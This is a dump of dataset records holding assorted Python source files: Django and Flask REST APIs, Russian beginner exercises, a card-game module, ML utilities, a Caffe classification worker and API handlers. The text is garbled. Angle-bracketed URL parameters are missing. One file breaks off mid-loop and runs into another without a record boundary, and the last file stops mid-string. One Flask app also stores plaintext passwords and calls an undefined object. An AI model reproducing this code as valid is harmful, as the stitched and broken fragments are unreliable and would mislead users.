+{"seq_id":"383301973","text":"from insights.models import Insight\nfrom django.shortcuts import render\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import InsightSerializer\n\nfrom .models import Insight\n# Create your views here.\n\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n 'List': '/insight-list/',\n 'Detail View': '/insight-detail//',\n 'Create': '/insight-create/',\n 'Update': '/insight-update//',\n 'Delete': '/insight-delete//'\n }\n return Response(api_urls)\n\n@api_view(['GET'])\ndef insightList(request):\n insights = Insight.objects.all()\n serializers = InsightSerializer(insights, many=True)\n return Response(serializers.data)\n\n@api_view(['GET'])\ndef insightDetail(request, pk):\n insights = Insight.objects.get(id=pk)\n serializers = InsightSerializer(insights, many=False)\n return Response(serializers.data)\n\n@api_view(['POST'])\ndef insightCreate(request):\n serializers = InsightSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data)\n\n@api_view(['POST'])\ndef insightUpdate(request, pk):\n insights = Insight.objects.get(id=pk)\n serializers = InsightSerializer(instance=insights, data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data)\n\n@api_view(['DELETE'])\ndef insightDelete(request, pk):\n insights = Insight.objects.get(id=pk)\n insights.delete()\n return Response(\"item deleted\")","sub_path":"insights/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"288018548","text":"# Задача-1:\n# Дан список фруктов.\n# Напишите программу, выводящую фрукты в виде нумерованного списка,\n# выровненного по правой стороне.\n\n# Пример:\n# Дано: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n# Вывод:\n# 1. яблоко\n# 2. банан\n# 3. киви\n# 4. арбуз\n\n# Подсказка: воспользоваться методом .format()\n\nprint(\"Задача 1\")\nfruit_list=[\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n\nfor x in range(0, len(fruit_list)):\n print('%d.'%(x+1), '{:>6}'.format(fruit_list[x].strip()))\n\n\n\n\n\n\n\n# Задача-2:\n# Даны два произвольные списка.\n# Удалите из первого списка элементы, присутствующие во втором списке и выведите результат.\nprint(\"\\nЗадача 2\")\nlist1=[i**2 for i in range(10)]\nlist2=[i**2 for i in range(0,20,2)]\n\nprint('Список 1:',list1)\nprint('Список 2:',list2)\ni=0\nwhile i 0:\n damage.Damage(source, target, 'fire attack', fire_attack_cards, 'fire',\n 1).operate(game_control)\n","sub_path":"ext/src/sleevecards/fire_attack.py","file_name":"fire_attack.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"642209247","text":"# -*- coding: utf-8 -*-\n\n# Author: Zhi Qiao \n\n# License: BSD 2 clause\n\nimport os\nimport numpy as np\n\ndef check_expdata_dir(expdata_id):\n \"\"\"\n Check whether the exp data folder exist,\n If not, will create the folder\n\n Parameters\n\n ----------\n root_dir : str,\n root dir of current project\n\n expdata_id : str, optional (default='init.test') \n name of current experiment data\n\n \"\"\"\n\n r_root = os.path.join('./', 'experiments_data')\n if os.path.exists(r_root) is False:\n os.mkdir(r_root)\n exp_root = os.path.join(r_root, expdata_id)\n if os.path.exists(exp_root) is False:\n os.mkdir(exp_root)\n\ndef check_model_dir(expmodel_id):\n \"\"\"\n Check whether the checkouts/results folders of current experiment(exp_id) exist,\n If not, will create both folders\n\n Parameters\n\n ----------\n root_dir : str,\n root dir of current project\n\n expmodel_id : str, optional (default='init.test') \n name of current experiment\n\n \"\"\"\n\n r_root = os.path.join('./', 'experiments_records')\n if os.path.exists(r_root) is False:\n os.mkdir(r_root)\n exp_root = os.path.join(r_root, expmodel_id)\n if os.path.exists(exp_root) is False:\n os.mkdir(exp_root)\n checkout_dir = os.path.join(exp_root, 'checkouts')\n result_dir = os.path.join(exp_root, 'results')\n if os.path.exists(checkout_dir) is False:\n os.mkdir(checkout_dir)\n if os.path.exists(result_dir) is False:\n os.mkdir(result_dir)\n\ndef label_check(y, hat_y = None, assign_task_type = None):\n \n def check_task_type(y, hat_y = None):\n if hat_y is not None:\n try:\n hat_y = np.array(hat_y).astype(float)\n y = np.array(y).astype(float)\n except:\n raise Exception('not support current data type of hat_y, y')\n _shape_hat_y, _shape_y = np.shape(hat_y), np.shape(y)\n if _shape_hat_y != _shape_y:\n raise Exception('the data shape is not inconformity between y and hey_y')\n\n label_n_check = set([])\n label_item_set = set([])\n label_row_set = set([])\n for each_y_path in y:\n label_n_check.add(len(np.array(each_y_path)))\n label_item_set.update(np.array(each_y_path).astype(int).tolist())\n label_row_set.add(sum(np.array(each_y_path).astype(int)))\n\n if len(label_n_check) != 1:\n raise Exception('label_n is inconformity in data')\n\n if len(label_item_set) <= 1:\n raise Exception('value space size <=1 is unvalid')\n elif len(label_item_set) == 2:\n if 0 in label_item_set and 1 in label_item_set:\n if list(label_n_check)[0] == 1:\n task_type = 'binaryclass'\n else:\n if max(label_row_set) == 1:\n task_type = 'multiclass'\n else:\n task_type = 'multilabel'\n else:\n raise Exception('odd value exist in label value space')\n else:\n if list(label_n_check)[0] == 1:\n task_type = 'regression'\n else:\n raise Exception('odd value exist in label value space')\n return task_type\n\n pre_task_type = check_task_type(y, hat_y)\n if assign_task_type != None:\n if assign_task_type in ['binaryclass', 'multilabel', 'multiclass', 'regression']:\n if assign_task_type == pre_task_type:\n task_type = pre_task_type\n else:\n raise Exception('current data not support the filled task-type {0}, task-type {1} is suggested'\\\n .format(assign_task_type, pre_task_type)) \n else:\n raise Exception('fill in correct task-type [\\'binaryclass\\', \\'multilabel\\', \\'multiclass\\', \\'regression\\'], \\\n or Without fill in Anyvalue')\n else:\n task_type = pre_task_type\n \n return task_type","sub_path":"pyhealth/utils/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"452053586","text":"#app.config['MONGO_DBNAME'] = ''\n#app.config['MONGO_URI'] = ''\n\n#mongo = PyMongo(app)\n\n#serve up index.html\n\nfrom flask import Flask, jsonify, request\nfrom flask.ext.pymongo import PyMongo\nfrom bson import ObjectId\n\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'hackrice17'\napp.config['MONGO_URI'] = 'mongodb://user:pass@ds149134.mlab.com:49134/hackrice17'\n\nmongo = PyMongo(app)\n\n###### DATA MODEL\n# User\n# {\n# _id : user id,\n# email: user email,\n# name: user's name,\n# pwd: password,\n# sid: shelter id\n# }\n#\n# Product\n# {\n# _id: product id (auto-populated),\n# name: product name,\n# amz_link: amazon link,\n# cost: cost of product\n# }\n#\n# Shelter\n# {\n# _id: shelter id (auto-populated),\n# name: shelter name,\n# lat: latitude,\n# lon: longitude,\n# address: address,\n# products: [\n# { pid (product id): count },\n# ...\n# ]\n# }\n\n# donator side\n# GET: /shelters\n# output:\n# {\n# 'result':\n# [\n# { sid: shelter id, name: shelter name, latitude: latitude,\n# longitude: longitude, address: shelter address, products:\n# products in shelter },\n# ...\n# ]\n# }\n@app.route('/shelters', methods=['GET'])\ndef get_all_shelters():\n shelters = mongo.db.shelters\n output = []\n for s in shelters.find():\n output.append({'sid': str(s['_id']), 'name': s['name'], 'latitude': s['lat'],\n 'longitude': s['lon'], 'address': s['address'], 'products': s['products']})\n return jsonify({'result': output})\n\n# GET: //productspecs\n# output:\n# {\n# 'result':\n# {\n# pid: product id,\n# name: product name,\n# cost: product cost,\n# amz_link: product's amazon link\n# } \n# 'INVALID UID' \n# }\n@app.route('//product_specs')\ndef get_product_specs(pid):\n product = mongo.db.products.find_one({'_id': pid})\n if product:\n output = {'pid': product['pid'], 'name': product['name'],\n 'cost': product['cost'], 'amz_link': product['amz_link']}\n else:\n output = 'INVALID UID'\n return jsonify({'result': output})\n\n# people in shelter side\n\n# POST: /signup\n# input:\n# {\n# uid: user id,\n# email: user email,\n# name: user name,\n# pwd: user password,\n# shelter_name: shelter name\n# }\n# output:\n# {\n# result: 'SIGN UP FAILED' \n# 'SIGN UP SUCESS' \n# }\n@app.route('/signup', methods=['POST'])\ndef sign_up():\n users = mongo.db.users\n # fields\n _id = request.json['uid']\n email = request.json['email']\n # if the user id already exists\n if users.find_one({'_id': _id}) or users.find_one({'email': email}):\n return jsonify({'result': 'SIGN UP FAILED'})\n name = request.json['name']\n pwd = request.json['pwd']\n sid = mongo.db.shelter.find_one({'name': request.json['shelter_name']})\n framework.insert({'_id': _id, 'email': email, 'name': name, 'pwd': pwd, 'sid': sid})\n return jsonify({'result': 'SIGN UP SUCCESS'})\n\n# GET: //userinfo\n# output:\n# {\n# 'result':\n# {\n# uid: user id,\n# sid: shelter id\n# } \n# 'INVALID UID' \n# }\n@app.route('//userinfo')\ndef get_user_shelter(uid):\n user = mongo.db.users.find_one({'_id': uid})\n if user:\n output = {'uid': uid, 'sid': user['sid']}\n else:\n output = 'INVALID UID'\n return jsonify({'result': output})\n\n\n# GET: /products\n# output:\n# {\n# 'result':\n# [\n# { uid: product id, name: product name },\n# ...\n# ]\n# }\n@app.route('/products', methods=['GET'])\ndef get_all_products():\n products = mongo.db.products\n output = []\n for p in products.find():\n output.append({'pid': str(p['_id']), 'name': p['name']})\n return jsonify({'result': output})\n\n@app.route('/product', methods=['POST'])\ndef add_product():\n shelters = mongo.db.shelters\n products = mongo.db.products\n sid = request.json['sid']\n pid = request.json['pid']\n count = request.json['count']\n shelter = shelters.find_one({'_id': ObjectId(sid)})\n if not shelter:\n return jsonify({'result': 'FAILED'})\n prod = None\n for p in shelter['products']:\n if p['pid'] == pid:\n prod = p\n break\n if prod:\n prod['count'] = prod['count'] + count\n else:\n prod = dict()\n prod['pid'] = pid\n prod['count'] = count\n shelter['products'].append(prod)\n shelters.save(shelter)\n return jsonify({'result': 'SUCCESS'})\n\n@app.route('/')\ndef home():\n #if 'username' in session:\n #return 'You are logged in as' + session['username']\n return render_template('index.html')\n\n@app.route('/main_app.html')\ndef login():\n return ''\n\n\n@app.route('/registration.html')\ndef register():\n return ''\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"FlaskApp/Shelper/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158858587","text":"import numpy as np\nfrom scipy.stats import sem\nfrom uncertainties import ufloat\nimport uncertainties.unumpy as unp\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\n\nthetanull = 10 # degree\nwellenlaenge = 633 * 10**(-9) # meter\nglasdicke = 10**(-3) # meter\nmesswerte = np.genfromtxt('data/m3.csv', unpack=True)\n\nwerte = ufloat(np.mean(messwerte), sem(messwerte))\nprint('Maxima/Minima', werte)\nn0 = f'{noms(werte):.1f}'\ns0 = f'{stds(werte):.1f}'\ns0 = s0[-1]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-werte.tex', 'w') as file:\n file.write(r'\\overline{M} &= \\num{')\n file.write(f'{n0}({s0})')\n file.write(r'}')\n\nphase = werte * 2 * np.pi\nprint('Phasenverschiebung', phase)\nn0 = f'{noms(phase):.0f}'\ns0 = f'{stds(phase):.0f}'\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-phase.tex', 'w') as file:\n file.write(r'\\overline{\\Del{Φ}} &= \\SI{')\n file.write(f'{n0}({s0})')\n file.write(r'}{\\degree}')\n\n\ndef BrechIndex(theta, maxmin, lambd, dicke, thetanull):\n return 1 / (1 - (lambd * maxmin) / (2 * dicke * theta * thetanull))\n\n\nbrechindex = BrechIndex(np.deg2rad(thetanull), werte, wellenlaenge, glasdicke, np.deg2rad(10))\nprint('Φ = 10° | Brechungsindex', brechindex)\nn0 = f'{noms(brechindex):.3f}'\ns0 = f'{stds(brechindex):.3f}'\ns0 = s0[-1]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-n10.tex', 'w') as file:\n file.write(r'n_{\\SI{10}{\\degree}} &= \\num{')\n file.write(f'{n0}({s0})')\n file.write(r'}')\n\nbrechindex = BrechIndex(np.deg2rad(thetanull - 1), werte, wellenlaenge, glasdicke, np.deg2rad(10))\nprint('Φ = 9° | Brechungsindex', brechindex)\nn0 = f'{noms(brechindex):.2f}'\ns0 = f'{stds(brechindex):.2f}'\ns0 = s0[-1]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/p-m3-n9.tex', 'w') as file:\n file.write(r'n_{\\SI{9}{\\degree}} &= \\num{')\n file.write(f'{n0}({s0})')\n file.write(r'}')\n","sub_path":"v64-m-moderne-interferometrie/python-skripts/m3.py","file_name":"m3.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"192042685","text":"import os\nimport time\nimport numpy as np\nimport caffe\nimport gear\nimport cStringIO as StringIO\nimport json\nimport urllib2\nfrom caffe.io import resize_image\nimport logging\n# logging.basicConfig(level=logging.DEBUG)\n\ncaffe.set_mode_cpu()\nMAX_PREDICT_LENGTH = 5\n\nRAW_SCALE = 255.\n\ndef load_binaryproto(fn):\n blob = caffe.proto.caffe_pb2.BlobProto()\n data = open(fn, 'rb').read()\n blob.ParseFromString(data)\n arr = np.array( caffe.io.blobproto_to_array(blob) )\n return arr[0]\n\n\nclass Classifier(object):\n def __init__(self, resoursesPath):\n mean_file = resoursesPath + \"/mean.binaryproto\"\n model_def_file = resoursesPath + \"/deploy.prototxt\"\n pretrained_model_file = resoursesPath + \"/models/huabot-brain.caffemodel\"\n\n mean=load_binaryproto(mean_file)\n\n self.net = caffe.Classifier(\n model_def_file, pretrained_model_file,\n image_dims=(256, 256),\n raw_scale=RAW_SCALE,\n channel_swap=(2, 1, 0)\n )\n\n in_shape = self.net.transformer.inputs[self.net.inputs[0]]\n if mean.shape[1:] != in_shape[2:]:\n mean = caffe.io.resize_image(mean.transpose((1,2,0)), in_shape[2:]).transpose((2,0,1))\n\n self.net.transformer.set_mean(self.net.inputs[0], mean)\n\n def classify_image(self, image):\n try:\n starttime = time.time()\n scores = self.net.predict([image], oversample=True).flatten()\n endtime = time.time()\n\n indices = (-scores).argsort()[:MAX_PREDICT_LENGTH]\n meta = [{'id':i, 'score': float(scores[i])} for i in indices]\n return (True, meta, endtime - starttime)\n\n except Exception as err:\n logging.exception(err)\n return (False, 'Something went wrong when classifying the '\n 'image. Maybe try another one?')\n\nclass Brain(object):\n def __init__(self, resoursesPath):\n self._clf = Classifier(resoursesPath)\n self._funcs = {}\n self._worker = gear.Worker('huaban-brain')\n\n def _add_func(self, func_name, callback):\n self._worker.registerFunction(func_name)\n self._funcs[func_name] = callback\n\n def add_server(self, host='localhost', port=4730):\n self._worker.addServer(host, port)\n\n def process(self):\n self._add_func('CAFFE:PREDICT', self.classify_image)\n self._add_func('CAFFE:PREDICT:URL', self.classify_image_url)\n while 1:\n job = self._worker.getJob()\n func = self._funcs.get(job.name)\n if func:\n try:\n func(job)\n except Exception as e:\n job.sendWorkComplete(json.dumps({'err': str(e)}))\n print('process %s error: %s'%(job.name, e))\n\n def classify_image(self, job):\n self._classify_image(job, job.arguments)\n\n def classify_image_url(self, job):\n url = job.arguments\n\n rsp = urllib2.urlopen(url, timeout=10)\n data = rsp.read()\n self._classify_image(job, data)\n\n def _classify_image(self, job, data):\n image = caffe.io.load_image(StringIO.StringIO(data))\n result = self._clf.classify_image(image)\n if result[0]:\n result = {'bet_result': result[1], 'time': result[2]}\n else:\n result = {'err': result[1]}\n print(result)\n job.sendWorkComplete(json.dumps(result))\n\n\ndef main(scripts, resoursesPath='resourses'):\n GEARMAND_PORT = os.environ.get('GEARMAND_PORT',\n 'tcp://127.0.0.1:4730')[6:].split(':')\n\n brain = Brain(resoursesPath)\n brain.add_server(GEARMAND_PORT[0], int(GEARMAND_PORT[1]))\n\n print(\"brain process\")\n brain.process()\n\nif __name__ == \"__main__\":\n import sys\n main(*sys.argv)\n","sub_path":"tools/predict_worker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"303129051","text":"from django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom .services.search_service import SearchService\nfrom .views.base import has_group\nfrom .forms.childminder_forms.form import SearchForm\nfrom .models import ApplicantName, ApplicantPersonalDetails, Application\n\n\n@login_required()\ndef search(request):\n \"\"\"\n This is the contact centre search applications page\n :param request: An Http request- you must be logged in.\n :return: The search template on GET request, or submit it and return the search results on POST\n \"\"\"\n\n SEARCH_TEMPLATE_PATH = 'search.html'\n\n cc_user = has_group(request.user, settings.CONTACT_CENTRE)\n arc_user = has_group(request.user, settings.ARC_GROUP)\n context = {\n 'cc_user': cc_user,\n 'arc_user': arc_user,\n 'empty': True\n }\n\n if (cc_user or arc_user) and request.user.is_authenticated:\n\n if request.method == 'GET':\n context['form'] = SearchForm()\n return render(request, SEARCH_TEMPLATE_PATH, context)\n\n elif request.method == 'POST':\n form = SearchForm(request.POST)\n context['form'] = form\n\n if form.is_valid():\n name = form.cleaned_data['name_search_field']\n dob = form.cleaned_data['dob_search_field']\n home_postcode = form.cleaned_data['home_postcode_search_field']\n care_location_postcode = form.cleaned_data['care_location_postcode_search_field']\n reference = form.cleaned_data['reference_search_field']\n\n if settings.ENABLE_NANNIES:\n application_type = form.cleaned_data['application_type_dropdown_search_field']\n else:\n application_type = 'Childminder'\n\n # If no search terms have been entered\n if not any([name, dob, home_postcode, care_location_postcode, reference]) \\\n and not (application_type or not settings.ENABLE_NANNIES):\n context['empty_error'] = True\n context['error_title'] = 'There was a problem with your search'\n context['error_text'] = 'Please use at least one filter'\n return render(request, SEARCH_TEMPLATE_PATH, context)\n\n search_results = SearchService.search(name, dob, home_postcode, care_location_postcode, reference,\n application_type)\n\n if search_results is not None and len(search_results) > 0:\n context['empty'] = False\n context['app'] = search_results\n\n else:\n context['empty_error'] = True\n context['error_title'] = 'No results found'\n context['error_text'] = 'Check that you have the correct details and spelling.'\n\n return render(request, SEARCH_TEMPLATE_PATH, context)\n else:\n return HttpResponseRedirect(settings.URL_PREFIX + '/login/')\n\n\ndef format_data(results):\n \"\"\"\n This adds the missing data from the objects returned from the search\n :param results: Querystring of objects that match query.\n :return: a querystring of results that match the search\n \"\"\"\n arr = list(results)\n for i in arr:\n # these if statements are not obvious, essentiall we need to get name, date submitted, updated and application id for each result found\n if hasattr(i, 'application_id'):\n if hasattr(i, 'personal_detail_id'):\n # DoB was searched for (has both personal_details_id and application_id columns)\n app = Application.objects.get(application_id=i.application_id.pk)\n name = ApplicantName.objects.get(personal_detail_id=i.personal_detail_id.pk)\n i.name = name.first_name + \" \" + name.last_name\n else:\n # This means an application id was searched for (has only application_id, and not\n app = Application.objects.get(application_id=i.application_id)\n\n if ApplicantName.objects.filter(application_id=app.pk).exists():\n name = ApplicantName.objects.get(application_id=app.pk)\n i.name = name.first_name + \" \" + name.last_name\n\n if hasattr(i, 'first_name'):\n # This if statement is for if they searched a name\n det = ApplicantPersonalDetails.objects.get(personal_detail_id=i.personal_detail_id.pk)\n i.application_id = det.application_id\n app = Application.objects.get(application_id=i.application_id.pk)\n i.name = i.first_name + \" \" + i.last_name\n\n if not app.date_submitted == None:\n i.submitted = app.date_submitted.strftime('%d/%m/%Y')\n else:\n i.submitted = None\n if not app.date_updated == None:\n i.accessed = app.date_updated.strftime('%d/%m/%Y')\n else:\n i.accessed = None\n\n i.type = 'Childminder'\n if app.application_status == 'DRAFTING':\n i.sub_type = 'Draft'\n elif app.application_status == 'ACCEPTED':\n i.sub_type = 'Pending checks'\n elif app.application_status == 'FURTHER_INFORMATION':\n i.sub_type = 'Returned'\n elif app.application_status == 'SUBMITTED':\n i.sub_type = 'New'\n elif app.application_status == 'ARC_REVIEW':\n i.sub_type = 'Assigned'\n else:\n i.sub_type = ''\n\n if hasattr(i, 'application_reference'):\n app_id = i.application_id\n else:\n app_id = i.application_id.pk\n i.link = '/arc/search-summary?id=' + str(app_id)\n i.audit_link = '/arc/auditlog?id=' + str(app_id)\n return results\n","sub_path":"arc_application/contact_centre.py","file_name":"contact_centre.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"650964325","text":"import re\n\nfrom dcapi.aggregates.handlers import execute_top\nfrom dcentity.models import Entity, EntityAttribute, BioguideInfo\nfrom piston.handler import BaseHandler\nfrom piston.utils import rc\nfrom urllib import unquote_plus\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom uuid import UUID\n\n\nget_totals_stmt = \"\"\"\n select cycle,\n coalesce(contributor_count, 0)::integer,\n coalesce(recipient_count, 0)::integer,\n coalesce(contributor_amount, 0)::float,\n coalesce(recipient_amount, 0)::float,\n coalesce(l.count, 0)::integer,\n coalesce(firm_income, 0)::float,\n coalesce(non_firm_spending, 0)::float,\n coalesce(grant_count, 0)::integer,\n coalesce(contract_count, 0)::integer,\n coalesce(loan_count, 0)::integer,\n coalesce(grant_amount, 0)::float,\n coalesce(contract_amount, 0)::float,\n coalesce(loan_amount, 0)::float,\n coalesce(e.count, 0)::integer,\n coalesce(e.amount, 0)::float,\n coalesce(cm.count, 0)::integer,\n coalesce(epa.count, 0)::integer,\n coalesce(r.docket_count, 0)::integer,\n coalesce(r.document_count, 0)::integer,\n coalesce(rs.docket_count, 0)::integer,\n coalesce(rs.document_count, 0)::integer,\n coalesce(f.member_count, 0)::integer,\n coalesce(f.committee_count, 0)::integer,\n coalesce(indexp.spending_amount, 0)::float,\n coalesce(fec_committee.total_raised, 0)::float,\n coalesce(fec_committee.count, 0)::integer\n from\n (select *\n from agg_entities\n where entity_id = %s) c\n full outer join\n (select *\n from agg_lobbying_totals\n where entity_id = %s) l\n using (cycle)\n full outer join\n (select *\n from agg_spending_totals\n where recipient_entity = %s) s\n using (cycle)\n full outer join\n (select *\n from agg_earmark_totals\n where entity_id = %s) e\n using (cycle)\n full outer join (\n select cycle, count\n from agg_pogo_totals\n where entity_id = %s) cm \n using (cycle)\n full outer join (\n select cycle, count\n from agg_epa_echo_totals\n where entity_id = %s) epa\n using (cycle)\n full outer join (\n select cycle, docket_count, document_count\n from agg_regulations_text_totals\n where entity_id = %s) r\n using (cycle)\n full outer join (\n select cycle, docket_count, document_count\n from agg_regulations_submitter_totals\n where entity_id = %s) rs\n using (cycle)\n full outer join (\n select cycle, member_count, committee_count\n from agg_faca_totals\n where org_id = %s) f\n using (cycle)\n full outer join (\n select cycle, spending_amount\n from agg_fec_indexp_totals\n where entity_id = %s) indexp\n using (cycle)\n full outer join (\n select cycle, total_raised, count\n from agg_fec_committee_summaries\n where entity_id = %s) fec_committee\n using (cycle)\n\"\"\"\n\ndef get_totals(entity_id):\n totals = dict()\n for row in execute_top(get_totals_stmt, *[entity_id] * 11):\n totals[row[0]] = dict(zip(EntityHandler.totals_fields, row[1:]))\n return totals\n\n\nclass EntityHandler(BaseHandler):\n allowed_methods = ('GET',)\n\n totals_fields = ['contributor_count', 'recipient_count', 'contributor_amount', 'recipient_amount', \n 'lobbying_count', 'firm_income', 'non_firm_spending', \n 'grant_count', 'contract_count', 'loan_count', 'grant_amount', 'contract_amount', 'loan_amount', \n 'earmark_count', 'earmark_amount', \n 'contractor_misconduct_count',\n 'epa_actions_count',\n 'regs_docket_count', 'regs_document_count', 'regs_submitted_docket_count', 'regs_submitted_document_count',\n 'faca_member_count', 'faca_committee_count',\n 'independent_expenditure_amount', 'fec_total_raised', 'fec_summary_count']\n ext_id_fields = ['namespace', 'id']\n\n def read(self, request, entity_id):\n\n try:\n entity_id = UUID(entity_id)\n entity = Entity.objects.select_related().get(id=entity_id)\n except ObjectDoesNotExist:\n return rc.NOT_FOUND\n except ValueError:\n return rc.NOT_FOUND\n\n totals = get_totals(entity_id)\n\n external_ids = [{'namespace': attr.namespace, 'id': attr.value} for attr in entity.attributes.all()]\n\n result = {'name': entity.name,\n 'id': entity.id,\n 'type': entity.type,\n 'totals': totals,\n 'external_ids': external_ids,\n 'metadata': entity.metadata}\n\n return result\n\n\nclass EntityAttributeHandler(BaseHandler):\n allowed_methods = ('GET',)\n fields = ['id']\n\n def read(self, request):\n namespace = request.GET.get('namespace', None)\n bioguide_id = request.GET.get('bioguide_id', None)\n id = request.GET.get('id', None)\n\n if (not id or not namespace) and not bioguide_id:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must include a 'namespace' and an 'id' parameter or a 'bioguide_id' parameter.\")\n return error_response\n\n if bioguide_id:\n entities = BioguideInfo.objects.filter(bioguide_id = bioguide_id)\n else:\n entities = EntityAttribute.objects.filter(namespace = namespace, value = id)\n\n return [{'id': e.entity_id} for e in entities]\n\n\nclass EntitySearchHandler(BaseHandler):\n allowed_methods = ('GET',)\n\n fields = [\n 'id', 'name', 'type',\n 'count_given', 'count_received', 'count_lobbied',\n 'total_given','total_received', 'firm_income', 'non_firm_spending',\n 'state', 'party', 'seat', 'lobbying_firm', 'is_superpac'\n ]\n\n stmt = \"\"\"\n select\n e.id, e.name, e.type,\n coalesce(a.contributor_count, 0)::integer,\n coalesce(a.recipient_count, 0)::integer,\n coalesce(l.count, 0)::integer,\n coalesce(a.contributor_amount, 0)::float,\n coalesce(a.recipient_amount, 0)::float,\n coalesce(l.firm_income, 0)::float,\n coalesce(l.non_firm_spending, 0)::float,\n pm.state, pm.party, pm.seat, om.lobbying_firm, om.is_superpac\n from matchbox_entity e\n inner join (select distinct entity_id\n from matchbox_entityalias ea\n where to_tsvector('datacommons', ea.alias) @@ to_tsquery('datacommons', quote_literal(%s))) ft_match\n on e.id = ft_match.entity_id\n left join politician_metadata_latest_cycle_view pm\n on e.id = pm.entity_id\n left join organization_metadata_latest_cycle_view om\n on e.id = om.entity_id\n left join agg_lobbying_totals l\n on e.id = l.entity_id and l.cycle = -1\n left join agg_entities a\n on e.id = a.entity_id and a.cycle = -1\n \"\"\"\n\n def read(self, request):\n query = request.GET.get('search', None)\n if not query:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must include a query in the 'search' parameter.\")\n return error_response\n\n parsed_query = ' & '.join(re.split(r'[ &|!():*]+', unquote_plus(query)))\n raw_result = execute_top(self.stmt, parsed_query)\n\n return [dict(zip(self.fields, row)) for row in raw_result]\n\n\nclass EntitySimpleHandler(BaseHandler):\n allowed_methods = ('GET',)\n\n fields = ['id', 'name', 'type', 'aliases']\n\n stmt = \"\"\"\n select e.id, name, type, case when count(alias) = 0 then ARRAY[]::varchar[] else array_agg(alias) end as aliases\n from matchbox_entity e\n left join matchbox_entityalias a on\n e.id = a.entity_id and e.name != a.alias\n %s -- possible where clause for entity type\n group by e.id, name, type\n order by e.id\n offset %%s\n limit %%s\n \"\"\"\n\n count_stmt = \"\"\"\n select count(*)\n from matchbox_entity\n %s -- possible where clause for entity type\n \"\"\"\n\n def read(self, request):\n count = request.GET.get('count', None)\n start = request.GET.get('start', None)\n end = request.GET.get('end', None)\n entity_type = request.GET.get('type', None)\n \n if entity_type:\n where_clause = \"where type = %s\"\n else:\n where_clause = ''\n\n if count:\n return dict(count=execute_top(self.count_stmt % where_clause, *([entity_type] if entity_type else []))[0][0])\n \n if start is not None and end is not None:\n try:\n start = int(start)\n end = int(end)\n except:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must provide integers for start and end.\")\n return error_response\n else:\n error_response = rc.BAD_REQUEST\n error_response.write(\"Must specify valid start and end parameters.\")\n return error_response\n\n if (end < start or end - start > 10000):\n error_response = rc.BAD_REQUEST\n error_response.write(\"Only 10,000 entities can be retrieved at a time.\")\n return error_response\n \n raw_result = execute_top(self.stmt % where_clause, *([entity_type] if entity_type else []) + [start, end - start + 1])\n return [dict(zip(self.fields, row)) for row in raw_result]\n\n","sub_path":"dcapi/aggregates/entities/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":9894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"109658091","text":"import os\nimport sys\n\nimport pyqtgraph as pg\n\nfrom nose import with_setup\n\n_lib_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'lib'))\nsys.path.insert(0, _lib_path)\nimport libpyuewr\n\n\ndef get_input(file_name):\n \"\"\"Get path to the input image file for testing.\"\"\"\n data_dir = os.path.join(os.path.abspath(os.path.dirname('__file__')), 'tests', 'data')\n return os.path.join(data_dir, 'input', file_name)\n\ndef get_baseline(file_name):\n \"\"\"Get path to the input image file for testing.\"\"\"\n data_dir = os.path.join(os.path.abspath(os.path.dirname('__file__')), 'tests', 'data')\n return os.path.join(data_dir, 'baseline', file_name)\n\n\ndef test_Image2DView():\n app = pg.Qt.QtGui.QApplication([])\n file_path = get_input('mri3D_0.mha')\n viewer = libpyuewr.create_viewer([file_path])\n","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"166315128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 2 11:25:10 2019\n\n@author: safin\n\n\"\"\"\nprint(\"Please be patient, depending on your spec, this may take 20-30 mins wait,afterwards you'll be promoted with two different graphs, one for Figure 4, and the other for Figure 5\")\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random as rand\n\n\ndef plot_3rd_diagram(x,y):\n \n plt.figure(figsize=(10,10))\n plt.plot(x,y)\n plt.plot(x,y,'bo')\n \n plt.xlabel(r\"$\\lambda$\", 